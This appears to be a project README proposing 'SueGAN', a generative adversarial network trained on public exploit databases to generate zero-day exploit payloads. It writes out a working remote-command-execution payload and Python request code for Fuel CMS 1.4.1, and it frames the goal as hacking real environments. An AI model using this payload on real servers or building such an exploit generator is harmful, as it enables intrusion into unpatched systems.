SueGAN-AI-to-generate-exploit-codes

Is it possible for an AI (a GAN, Generative Adversarial Network) to generate exploit code automatically?

Objective create SueGAN

I have been taking the courses at https://tryhackme.com/. They are good and I recommend them, but you are not going to hack any real environment with them. (Nobody is going to break into a website whose administrators know how to press the update button.) We have extensive experience with neural networks.

To hack real environments you need a zero-day exploit, which you can obtain in two ways:

Through a honeypot: create a deliberately vulnerable environment, wait for a MASTER hacker to attack it, capture the attack code there, and take the zero-day.
Know a lot and find the vulnerability yourself (everybody will die doing low-level reverse engineering before finding it).

Can you feed a TensorFlow GAN with previously known exploit code and have the GAN end up generating zero-day exploits?

Note: in this project the word AI will not be used again. It is a marketing word; when programming IT MEANS NOTHING. Every time a programmer says AI instead of Reinforcement Learning, TensorFlow, PyTorch or Decision Tree, a kitten dies XD

What is a GAN neural network?

A GAN (Generative Adversarial Network; the tutorial linked below uses a Deep Convolutional GAN, DCGAN) trains two models simultaneously through an adversarial process. The Generator ("the artist") learns to create images that look real, while the Discriminator ("the art critic") learns to tell real images from fake ones. More info: https://www.tensorflow.org/tutorials/generative/dcgan

Example: a GAN is fed with anime faces (an image matrix of 360 width, 360 height, 3 color channels) and, after many training rounds, it ends up generating images of "invented" anime characters, that is, images that were not made by any human. Why not an n x n exploit matrix?

Code example GANs anime

For more details on GAN technology

Example of creating images of a hybrid animal between horses and zebras

Remember that although the examples use images, for the GAN an image (an image matrix of 360 width, 360 height, 3 color channels) and Python code (a tokenized matrix of N tokens, for N code files) are the same thing: a data array. It is true that, to take the form of a GAN input matrix, an image needs a different treatment than a text in German or a piece of Python code. Reinforcement Learning could also do it, but it does not reach the creativity levels of the GAN.

What is an exploit?

It is a piece of code, or a set of them, that lets you take advantage of an "extra function" of the attacked server. The people running the server are not aware of this extra function, which was introduced unintentionally during development.

Here we can see a good example of an exploit: https://www.exploit-db.com/exploits/50477. It targets servers running Fuel CMS v1.4.1 (https://www.getfuelcms.com/).

If a search request is made http.serveratack.com/fuel/pages/select/?filter
The payload is added behind %27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b %24%61%28%27
After the payload comes a shell command, for example one that simply lists the files on the server: dir /l
It ends with the closing part of the payload, %27%29%2b%27. The server returns the list of files, or the output of any other command; the machine is completely compromised.

The python code looks like this:

cmd = input(Style.BRIGHT+Fore.YELLOW+"Enter Command $"+Style.RESET_ALL)
main_url = url+"/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+quote(cmd)+"%27%29%2b%27"
r = requests.get(main_url)

From this explanation and the link https://www.exploit-db.com/exploits/50477, the sweet spot is the payload. The rest of the code is auxiliary Python; in fact it could just as well be written in Java or C#. The main idea is to create a GAN that finds payloads.

Where does the data set come from?

To generate images of horses that look like zebras, we need a large dataset of images of zebras and horses.

To create the payload you need to collect all the Python exploits (the first versions will use only Python; more languages will be added later). The vast majority of known exploits can be found on these sites:

https://www.exploit-db.com/ Exploit Database, a public archive of exploits maintained by OffSec
https://nvd.nist.gov/vuln/full-listing USA National Vulnerability Database
https://www.tenable.com/products/nessus Nessus vulnerability scanner (free and paid versions)
https://www.rapid7.com/db Vulnerability & Exploit Database (used in Metasploit https://docs.rapid7.com/metasploit/managing-the-database/ )
https://github.com/ can be searched by keywords such as "POC", "vulnerability" or "cve"

Put the data into the GAN

For the Python exploit code to enter the GAN, tokenization (transformation into a matrix) is required. Each language requires its own tokenization scheme: English, French... (more information on what tokenization is: https://www.tensorflow.org/text/guide/tokenizers )

You can play with tokenization the way ChatGPT does it here: https://platform.openai.com/tokenizer

Programming languages require their own tokenization mode. These libraries and articles can help with tokenizing Python source:

https://benjam.info/blog/posts/2019-09-18-python-deep-dive-tokenizer/ (reading the whole article is recommended)
https://docs.python.org/3/library/tokenize.html https://documentation.help/Python-3.6.8/tokenize.html
https://pypi.org/project/code-tokenize/
https://github.com/huggingface/tokenizers/tree/main?tab=readme-ov-file#bindings
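As an illustration of what "tokenization (transformation into a matrix)" means, here is a minimal sketch that uses only the standard-library tokenize module linked above. The sample snippets are harmless placeholders, and the helper names token_strings, build_vocab and to_matrix are hypothetical, chosen for this example; they are not part of the project. It assumes a simple scheme in which every distinct token string gets an integer id and shorter rows are padded with 0.

```python
import io
import tokenize

# Harmless placeholder snippets, used only to illustrate the idea.
SAMPLES = [
    "x = 1 + 2\n",
    "print('hello')\n",
]

# Token types that describe layout or encoding rather than code content.
SKIPPED = {
    tokenize.ENCODING, tokenize.NEWLINE, tokenize.NL,
    tokenize.INDENT, tokenize.DEDENT, tokenize.ENDMARKER,
}


def token_strings(source):
    """Split a Python source string into its token strings."""
    readline = io.StringIO(source).readline
    return [
        tok.string
        for tok in tokenize.generate_tokens(readline)
        if tok.type not in SKIPPED
    ]


def build_vocab(token_lists):
    """Assign an integer id to each distinct token; id 0 is reserved for padding."""
    vocab = {"<pad>": 0}
    for tokens in token_lists:
        for tok in tokens:
            vocab.setdefault(tok, len(vocab))
    return vocab


def to_matrix(token_lists, vocab):
    """Turn token lists into equal-length rows of ids, padded with 0."""
    width = max(len(tokens) for tokens in token_lists)
    return [
        [vocab[tok] for tok in tokens] + [0] * (width - len(tokens))
        for tokens in token_lists
    ]


token_lists = [token_strings(src) for src in SAMPLES]
vocab = build_vocab(token_lists)
matrix = to_matrix(token_lists, vocab)

for row in matrix:
    print(row)
```

Each row of the resulting matrix corresponds to one source file and each column to one token position, which is the same kind of numeric array an image becomes after loading. A real pipeline would more likely use a learned subword tokenizer such as the Hugging Face library listed above; this sketch only shows the shape of the data.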

Training. Generator and Discriminator

The Generator ("the artist") must generate .py code and correct it based on the score returned by the Discriminator ("the art critic"). The Discriminator should answer the question: how close is this to being a viable payload?

To really check it, a real machine to attack would be required. That environment is complex, so generating around 5000 .py files with potential attacks is enough; those then have to be checked against the real machine. The Discriminator must be able to verify that the code compiles and can reach the target. Training should focus on creating payloads. It would help a lot to understand the steps the programmer-hacker took to discover the exploit.

Steps Architecture:

Feel free to suggest changes.

Collect .py files from the exploit databases.
Tokenize the contents of each .py file. The code is one thing and the payload is another; each one needs its own way of becoming a matrix.
Create two Discriminators (art critics). One neural network must answer the question: how close is this .py to being viable code? The other answers: how close is this payload to being a viable payload? The type of payload matters a lot: https://portswigger.net/burp/documentation/desktop/tools/intruder/configure-attack/payload-types
Create the Generator (the artist), which should generate code and payloads starting from random input, weighted by the Discriminators (like the anime images, but with code).
Evaluation: create real virtualized environments for testing the generated payloads. This tool will generate around 100000 payloads, of which only one will work. The one that works XD

We are currently developing privately. If you want to join the team, please contact us: https://www.linkedin.com/in/luislcastillo/

The name Sue

The name is a curious tribute to Argentina 🇦🇷 🌞. Sue Carpenter is the nurse who took Diego Maradona off the field at the 1994 USA soccer World Cup ⚽ (Foxboro Stadium, Massachusetts, June 25, Argentina beat Nigeria 2-1). Sue was the only person who could stop Diego; no other soccer player in history could stop him. "The tool that kills the God of soccer". After that he never played in a World Cup again.
